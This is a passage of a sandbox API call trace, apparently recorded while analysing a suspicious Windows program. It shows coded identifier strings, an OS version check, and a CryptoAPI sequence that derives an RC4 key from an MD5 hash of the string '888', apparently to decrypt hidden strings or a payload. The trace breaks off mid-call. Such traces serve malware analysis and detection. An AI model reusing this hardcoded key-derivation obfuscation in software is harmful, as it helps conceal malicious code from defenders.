lpMsg=0x8cf4a8) returned 0 [0215.747] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.747] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.747] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab758 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.747] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0215.747] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9c8 | out: hHeap=0x2af0000) returned 1 [0215.747] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.748] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.748] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0215.748] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0215.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.748] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.748] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.748] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.748] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.748] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0215.748] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0215.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0215.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0215.748] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f7220, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0215.749] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c770) returned 1 [0215.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.749] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0215.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.749] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0215.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.750] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.750] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.750] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.750] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.750] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.751] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.751] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0215.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.751] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0215.751] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.751] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.752] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.752] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.752] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.752] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.752] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.752] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.752] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0215.752] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.752] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0215.752] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.752] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.753] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.753] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.753] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.753] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc98, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0215.753] CryptCreateHash (in: hProv=0xa7c770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.753] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72628, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.754] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0215.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0215.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72698, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0215.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.754] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.754] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.754] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.754] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.754] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.754] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0215.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aabb78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0215.754] CryptHashData (hHash=0x9e1bf8, pbData=0x2a726a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0215.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.754] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.754] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.754] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.754] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.755] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0215.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.755] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0215.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.755] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0215.755] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aabb18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0215.755] CryptDeriveKey (in: hProv=0xa7c770, Algid=0x6601, hBaseData=0x9e1bf8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e1c38) returned 1 [0215.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.755] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.755] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.755] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.755] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.755] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0215.756] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0215.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f6fe0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0215.756] CryptDestroyHash (hHash=0x9e1bf8) returned 1 [0215.756] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 